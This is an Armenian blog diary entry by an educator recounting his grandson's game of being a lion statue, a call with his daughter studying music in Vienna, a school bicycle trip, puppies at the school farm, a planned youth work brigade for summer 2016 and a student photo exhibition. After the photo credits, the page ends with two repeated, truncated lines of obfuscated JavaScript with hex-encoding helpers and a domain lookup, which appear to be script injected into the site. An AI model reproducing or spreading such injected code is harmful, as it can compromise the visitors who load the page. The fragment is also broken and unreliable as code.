Հիմա կեսգիշերն անց է, մեկին մոտ. իսկ երեկ իրիկունը 8-ի-9-ի արանքում, հիմա պարզվում է՝ հանգել եմ… ինչպես Դավիթ Բլեյանը՝ ժամեր հետո, երբ այլևս ոչինչ չի կարողանում, երբ շարժվել՝ մտքով-մարմնով չի լինում…
— Արձանանո՞ւմ եմ,- Դավիթն ասաց երեկ առավոտյան, երբ մոտեցա, որ արթնացնեմ, տեղից հանեմ, շարժեմ…
— Հայրիկ, ես արձան եմ՝ առյուծի արձան…
Ես էլ թե.
— Առյուծ-արձա՞ն.. Տանեմ՝ արձանը լվամ-պլպլացնեմ ու էն էլ՝ ցնցուղի տակ:
Ես բարեխիղճ լվանում էի արձանը.
— Արձան լվացող հայրի՞կ ես դու: Բա աշխարհի արձաններն ո՞վ է լվանում…
Հետո բոլոր արձանները իստակ-մաքուր իջան պատվանդաններից ու…
Դավիթն էր. ընկավ նրանց ետևից,
Որին մի սարից, որին մի ձորից,
Գել, ինձ, առյուծ, արջ, վագըր բռնեց,
Հավաքեց, բերավ, իր նախրին խառնեց…
— Ոռնո՜ց, մըռընչյո՜ւն, աղմո՜ւկ, աղաղա՜կ…
Դավիթը կարդում է ջրի տակ՝ տուտուզով-մեջքով դեպի ինձ…Ո՜նց ենք տղամարդիկով ծիծաղում-լողացնում…
— Պա՛պ, բա որ արձանները պատվանդանով գան քաղաք, ի՞նչ կլինի…
Առյուծն ու վարդերը:
Լուսանկարները՝ Արմինե Աբրահամյանի:
Էս՝ երեկ առավոտյան: Հեշտ էր օրը, լուսը առաջներս… Հիմա օրը-գիշերը՝ իմ առաջ… Դավիթն ու աշխարհը հանգած… անշարժ… Շուշան Բլեյանի հետ խոսեցի, ժամերի տարբերությունը, աղջիկը Վիեննայում հենց հոր այսպիսի վիճակի համար է… Շուշանը պատմեց, որ մայիս-հունիսն իր համար համերգների-ելույթների ամիս է… Մի պարսիկ կոմպոզիտոր-ուսանող կա իրենց կոնսերվատորիայում՝ Ալի Հուսեյն, կույր, այո՛, կույր՝ աչոք, ու միասին երկու երգ են պատրաստում համերգի դուետի համար, մեկն «Արի իմ սոխակ»-ն է, որի գործիքավորումը Ալին է արել, մյուսը՝ պարսկական… Արանքում այս ամենի Շուշանը հայտ է ներկայացնում մի ֆոնդի՝ կրթաթոշակ ստանալու համար… Հպարտություն, հոր համար անսպառ գլուխ գովալու աղջիկ ունեմ…Շուշանի տրամադրությունը բարձր էր, այնքա՜ն բարձր, որ փոխանցեց ինձ, ու հայր-աղջիկ մեր աշխույժով սկսեցինք լցնել գիշերը… Հիմա ես գրում եմ. այս մեկն էլ՝ վեց հարյուր վաթսունութերորդը, այսպես լինի-դառնա-հասնի քեզ, ընթերցո՛ղ…
Հեծանվաերթ Մայր դպրոցից Հիմնական դպրոց:
Լուսանկարները՝ Գայանե Գրիգորյանի:
Երբ հերթական հեծանվային ակումբը դեռահասների՝ Հիմնական դպրոցի չորրորդ-հինգերորդցիների հետ, Գայանե Գրիգորյանի ու Հասմիկ Պողոսյանի հետ հասցրինք Անկախ մայլա… ծափահարեցինք, ես իմ հետդարձը չէի կարող չօգտագործել. մեր գյուղացիական տնտեսությունում չլինել… Ռոքսիի բնի-տնակի մոտ հերթ էր… Քնարիկը՝ իր խմբով Գեղարվեստի, հետո՝ Սոնա Փափազյանը՝ Դպրոց-պարտեզի մեծ խմբով… Մայր Ռոքսիի-հայր Մայքիի չորս քոթոթները՝ աչքերը փակ, բայց իրական՝ մոր պուտուկներին կպած… Լուսինե Աբրահամյանի ուշադիր հսկողությամբ… Վա՜յ, Լուսո ջան, ի՜նչ լավ է, որ դու այսպիսին ես, կենդանասեր՝ ձիավարժ, շնապահ՝ ծնունդ ընդունելու պահից… Քեզ է վստահված ամենակարևորը-հաստատունը՝ սեբաստացի հաստատությունների պահապանների պահպանություն-խնամքը… Ես, որ իմ առաջին վաթսուն տարում, կոչենք վայրի շրջան իմ կյանքի, կենդանապահ չեմ եղել, իմ երկրորդ վաթսունը՝ պարտիզպանության, սկսում եմ կրթական պարտեզով-գյուղացիական տնտեսությամբ, շներով՝ ցեղական, ձիերով… Իսկ տնտեսությունը մենակ Խորենի բանը չէ, Լուսոն էլ միացավ… Կմնա… շինարարական ջոկատը… Գիտե՞ք՝ ինչքա՜ն գործ կա անելու, ծո՜վ… Ու ես հայտարարում եմ սովորողների առաջին ջոկատի հավաքագրումը Բանգլադեշյան ամառ 2016-ի շրջանակում… Խորենի հրամանատարությամբ, Լուսինեի կոմիսարությամբ, վարպետ Քաջիկով, շնապահությամբ, ձիասպորտով-ձիաբուծությամբ, գոմի ու մանեժի վերակառուցումով, հացատնով, ջերմոցով, բոստանով, թռչնաբուծությամբ… Իսկական գյուղացիական տնտեսություն, որն այսօր ապրում-շենանում է մեր Բանգլադեշում… Թող այս ջոկատն աշխատանքային լինի առաջինը Բանգլադեշում… Հետևե՛ք իմ գրին, ես հերթով հրապարակելու-ընդունելու եմ հաջորդ շինարարական- պատանեկան-աշխատանքային ջոկատների հայտերը… Շատ կոնկրետ խնդիրներով, գործերով, նախագծերով, անելիքներով… Վստահե՛ք ինձ, Ղազախստանից Մուրմանսկով-Մարի Էլ ու Չուկոտկա տեսած-կառուցած ուսանողը՝ այսպիսի փառահեղ կենսափորձով, վերելքով-վայրէջքով ինչո՞ւ չի կարող 2016-ի ամռանը Բանգլադեշում պատանեկան շինարարական ջոկատների մեկնարկը տալ… Տալիս եմ: Լսվե՞ց:
Դպրոց-պարտեզի 6 տարեկանները:
Լուսանկարները՝ Արմինե Գյոնջյանի:
Ասատրյան Նորայրի հրապարակումներն այս մանիֆեստի ռեֆորմատորի ազդեցություն ունեցա՞ն… Այսպիսի հայացք Կարմիր գյուղի՞ց, գիտե՞ք, իմ մոր ծննդավայրն է. այսքա՜ն շիտակ-ինքնուրույն-ազատ մտքով.. Քույրն էլ՝ Սիրանույշ… Ասատրյան ընտանիքը, համեցե՛ք, Մերկուրիի անցումն արեգակի սկավառակով դիտելու հնարավորություն է տալիս: Կրթահամալիրը մեր, մտածել եմ-մտմտացել, որպես նախագծի ղեկավար, իբրև այսպիսի ընտանեկան տարածքների կոոպերացիա-ցանց-հասարակություն-միավորում է… Համեցե՛ք, ներկայացեք ու ներկայացրեք, բացելու-բացվելու ժամանակն է այս ամառը, ո՜ղջ ստեղծական ընտանեկան-համայնքային ուժով հանդես գալու… Այս կրթական պարտեզը որպես միջոցառում մի՛ դիտեք, այլ որպես հանրային բաց տարածք, հարթակ՝ ձեր ընտանեկան-խմբային-ջոկատային նախագծերով ներկայանալու, նոր որակի, մեզանում չտեսնված-չլսված, տո՛, անգամ չպատմված կրթական համայնք ձևավորելու…Հաջող մի նախագծի՝ թիմային ուսումնական աշխատանքի ցուցադրության արժանացանք երեկ Գեղարվեստի ցուցասրահում՝ Մարինե Մկրտչյանի ու իր ֆոտոջոկատի ցուցադրությունը որպես թիմային երկարատև գործունեության հանրայնացում… Կեցցե՛ք, եթե Գայանե Դավթյանի նման կինը՝ մեր շրջանավարտը, գալիս է, փաթաթվում Տիգրան Իսկանդերյան տղային ու հայտարարում.
— Իմ տղան իրեն գտավ իմ կրթահամալիրում… Շնորհակալ եմ:
Հուզեց ինձ Գայանեն՝ այնքան, որ մի պահ խոսելուս ընդունակությունն էի կորցրել… Մի պահ ես կպել էի սյանը ցուցասրահի, արձանացել էի… Ինչպես առավոտը՝ Վալեում, Մերկուրիում, գուցե Բերկրիո՞ւմ…
Լուսանկարները՝ Մարթա Ասատրյանի:
Ֆոտոխմբագիր՝ Անահիտ Հարությունյան
# 668// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e